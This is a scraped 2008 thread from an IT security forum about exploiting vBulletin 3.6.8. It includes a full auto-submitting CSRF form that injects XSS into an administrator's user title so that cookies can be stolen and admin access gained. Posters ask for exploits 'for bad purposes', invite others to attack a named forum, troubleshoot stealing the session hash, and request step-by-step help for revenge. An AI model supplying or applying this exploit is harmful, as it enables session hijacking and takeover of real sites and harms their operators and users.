Waraxe IT Security Portal
Login or Register
November 24, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 52
Members: 0
Total: 52
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> vBulletin Board -> vbulletin 3.6.8 exploit
Post new topicReply to topic View previous topic :: View next topic
vbulletin 3.6.8 exploit
PostPosted: Tue Apr 01, 2008 5:36 pm Reply with quote
akrlot
Beginner
Beginner
Joined: Apr 01, 2008
Posts: 4




hello;
does anybody have an exploit for vbulletin 3.6.8?
please pm me. i will use it for bad purposes...
View user's profile Send private message
PostPosted: Tue Apr 01, 2008 8:13 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




I don't see working Xploit for vBulletin v 3.6.8.
View user's profile Send private message
PostPosted: Sat Apr 05, 2008 9:03 am Reply with quote
NEUR0BASHER
Regular user
Regular user
Joined: Apr 05, 2008
Posts: 6




Hi!

vBulletin 3.6.8 XSRF/XSS Vulnerability
vBulletin Version: 3.6.8 Patch Level x and possible lower

As administrators can use html in the usertitle an attacker can update the profile of an administrator by sending a link to a site with a code like this:

Code:
<html>
<head></head>
<body onLoad=javascript:document.form.submit()>

<form action="http://domain.tld/[path]/vBulletin/profile.php?do=updateprofile";
method="POST" name="form">

<input type="hidden" name="s" value="">
<input type="hidden" name="do" value="updateprofile">
<input type="hidden" name="customtext" value="###########XSS CODE#########">
<!-- Attacker's XSS Code -->
<input type="hidden" name="month" value="-1">
<input type="hidden" name="day" value="-1">
<input type="hidden" name="year" value="">
<input type="hidden" name="oldbirthday" value="">
<input type="hidden" name="showbirthday" value="2">
<input type="hidden" name="homepage" value="">
<input type="hidden" name="icq" value="">
<input type="hidden" name="aim" value="">
<input type="hidden" name="msn" value="">
<input type="hidden" name="yahoo" value="">
<input type="hidden" name="skype" value="">
</form>
</body>
</html>


If the attacker sends a link to the admin (in a pm for example) the admin's usertitle will be updated and contains the new code of the attacker now. The code will be executed as soon as the admin has submitted a new posting. Now the attacker can steal the cookies of user's who are reading the thread.


Is anyone interested to try this exploit with me on a particular forum? I know one forum that has enabled html entities would be easy to gain admin access.

cheers
neuro
View user's profile Send private message
PostPosted: Sun Apr 06, 2008 4:28 am Reply with quote
gibbocool
Advanced user
Advanced user
Joined: Jan 22, 2008
Posts: 208




Very nice, it's working great for me Smile

I'm having a problem saving the cookie though, I'm just using document.cookie and it isn't getting bbsessionhash. It's only getting bblastvisit and bblastactivity. What's going on?

Also it looks like you need have the html page on the same domain as the forum, or it won't accept it as it's not on the whitelist.

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
PostPosted: Tue Apr 08, 2008 6:13 pm Reply with quote
NEUR0BASHER
Regular user
Regular user
Joined: Apr 05, 2008
Posts: 6




gibbocool wrote:
it isn't getting bbsessionhash. It's only getting bblastvisit and bblastactivity. Also it looks like you need have the html page on the same domain as the forum, or it won't accept it as it's not on the whitelist.

Hi! That's extactly the problem: You won't get the bbsessionhash with the cookie as the php skript must run on the same server as the vbulletin software (see: http://www.waraxe.us/ftopict-2506.html ).

It will only work this way: The php code must be embedded into site admin's user title:
Quote:
the admin's usertitle will be updated and contains the new code of the attacker now. The code will be executed as soon as the admin has submitted a new posting. Now the attacker can steal the cookies of user's who are reading the thread
View user's profile Send private message
PostPosted: Sat May 24, 2008 5:37 am Reply with quote
aquadeluxe
Regular user
Regular user
Joined: Jan 03, 2008
Posts: 11




I am trying to use this. I have gotten everything working for what I want, but when I try to execute it, it says the server doesn't allow POST through my server due to it not being in a whitelist. As I do not know the whitelist, I uploaded the file as a doc on the forum, then I used readfile() in PHP and set the header as HTML and it wouldn't work correctly. Pretty much what I need to do is load the "doc" file as an HTML file on there server. Is there any way of doing that?
View user's profile Send private message
PostPosted: Sat May 24, 2008 12:59 pm Reply with quote
gibbocool
Advanced user
Advanced user
Joined: Jan 22, 2008
Posts: 208




aquadeluxe wrote:
I am trying to use this. I have gotten everything working for what I want, but when I try to execute it, it says the server doesn't allow POST through my server due to it not being in a whitelist. As I do not know the whitelist, I uploaded the file as a doc on the forum, then I used readfile() in PHP and set the header as HTML and it wouldn't work correctly. Pretty much what I need to do is load the "doc" file as an HTML file on there server. Is there any way of doing that?

If there was a way of doing that it would make life very easy.

If the forum has html enabled you could just put the xss code in a post.

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
PostPosted: Mon Jun 16, 2008 12:57 pm Reply with quote
Messenger_of_Death
Beginner
Beginner
Joined: Jun 16, 2008
Posts: 2




How can i hack ...


Last edited by Messenger_of_Death on Tue Jun 17, 2008 8:18 am; edited 1 time in total
View user's profile Send private message
PostPosted: Mon Jun 16, 2008 10:58 pm Reply with quote
tr0nix
Active user
Active user
Joined: Mar 06, 2008
Posts: 48




Messenger_of_Death wrote:
How can i hack *CENSORED*


man, read the damn rules!
no sites / ips!
View user's profile Send private message Send e-mail
PostPosted: Tue Jun 17, 2008 8:19 am Reply with quote
Messenger_of_Death
Beginner
Beginner
Joined: Jun 16, 2008
Posts: 2




Sorry man...
View user's profile Send private message
PostPosted: Mon Oct 20, 2008 12:16 am Reply with quote
TDawg
Beginner
Beginner
Joined: Oct 20, 2008
Posts: 2




NEUR0BASHER wrote:
Hi!

vBulletin 3.6.8 XSRF/XSS Vulnerability
vBulletin Version: 3.6.8 Patch Level x and possible lower

As administrators can use html in the usertitle an attacker can update the profile of an administrator by sending a link to a site with a code like this:

Code:
<html>
<head></head>
<body onLoad=javascript:document.form.submit()>

<form action="http://domain.tld/[path]/vBulletin/profile.php?do=updateprofile";
method="POST" name="form">

<input type="hidden" name="s" value="">
<input type="hidden" name="do" value="updateprofile">
<input type="hidden" name="customtext" value="###########XSS CODE#########">
<!-- Attacker's XSS Code -->
<input type="hidden" name="month" value="-1">
<input type="hidden" name="day" value="-1">
<input type="hidden" name="year" value="">
<input type="hidden" name="oldbirthday" value="">
<input type="hidden" name="showbirthday" value="2">
<input type="hidden" name="homepage" value="">
<input type="hidden" name="icq" value="">
<input type="hidden" name="aim" value="">
<input type="hidden" name="msn" value="">
<input type="hidden" name="yahoo" value="">
<input type="hidden" name="skype" value="">
</form>
</body>
</html>


If the attacker sends a link to the admin (in a pm for example) the admin's usertitle will be updated and contains the new code of the attacker now. The code will be executed as soon as the admin has submitted a new posting. Now the attacker can steal the cookies of user's who are reading the thread.


Is anyone interested to try this exploit with me on a particular forum? I know one forum that has enabled html entities would be easy to gain admin access.

cheers
neuro


Could someone give me a step by step on this.... It would be a great help... This forum that I want to use this on are total pricks and the owner of the site totally bashed a good great of mine for no reason at all.....AND I WANT TO GET EVEN !!!!! Please help
View user's profile Send private message
PostPosted: Mon Aug 03, 2009 3:01 am Reply with quote
mRnOnAmEv
Beginner
Beginner
Joined: Aug 02, 2009
Posts: 2




Has anyone got this to work on 3.6.8?
View user's profile Send private message
vbulletin 3.6.8 exploit
www.waraxe.us Forum Index -> vBulletin Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.051 Seconds